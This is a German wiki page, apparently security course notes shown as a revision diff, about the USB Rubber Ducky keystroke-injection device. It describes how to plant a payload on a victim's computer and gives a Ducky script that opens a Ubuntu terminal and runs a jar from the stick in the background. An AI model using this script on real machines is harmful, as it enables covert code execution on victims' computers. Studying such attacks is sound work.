USB: Rubber Ducky: Difference between revisions
(Created page with "== Grundlagen == [..] Rubber Ducky ist ein Microcontroller (AMTEL 32bit) mit SD-Karte der aussieht wie ein USB-Stick und sich verhält wie eine Tastatur. So kann alles mit dem …") |
|||
Line 32: | Line 32: | ||
<code> |
<code> |
||
REM open terminal on ubuntu-distros |
REM open terminal on ubuntu-distros<br> |
||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
ENTER |
ENTER<br> |
||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
⚫ | |||
ENTER |
ENTER |
||
</code> |
</code> |
Revision as of 22:43, 13 October 2017
Grundlagen
[..]
Rubber Ducky ist ein Microcontroller (AMTEL 32bit) mit SD-Karte der aussieht wie ein USB-Stick und sich verhält wie eine Tastatur. So kann alles mit dem Gerät gemacht werden, was mit der Tastatur gemacht werden könnte.
Allg. Ablauf:
1.SD-Karte einstecken
2.Ducky-Script encoden (.jar oder Website toolkit) zu .bin
3.Payload (.bin) auf SD-Karte ablegen
4.USB-Stick in Opfer-Rechner stecken
5.Payload führt sich automatisch aus
Angriffsszenarien
-1.Angriffsszenario: Angreifer kann selbst (zumindest für einen kurzen Zeitraum) auf das Gerät physisch zugreifen und den RubberDucky selbst einstecken.
-2. Angriffsszenario: Angreifer muss Oper dazu bewegen, selbst RubberDucky in den Zielrechner einzustecken.
Bash starten
-1.Problem: Betriebssystem ermitteln
1.Lösungsansatz: Hotkeys
DetourDuck
REM open terminal on ubuntu-distros
DELAY 500
CTRL-ALT t
DELAY 50
ENTER
DELAY 5000
STRING java -jar /media/$USER/DUCKYDRIVE/RubberDucky.jar &
DELAY 50
ENTER
DELAY 5000
STRING exit
DELAY 50
ENTER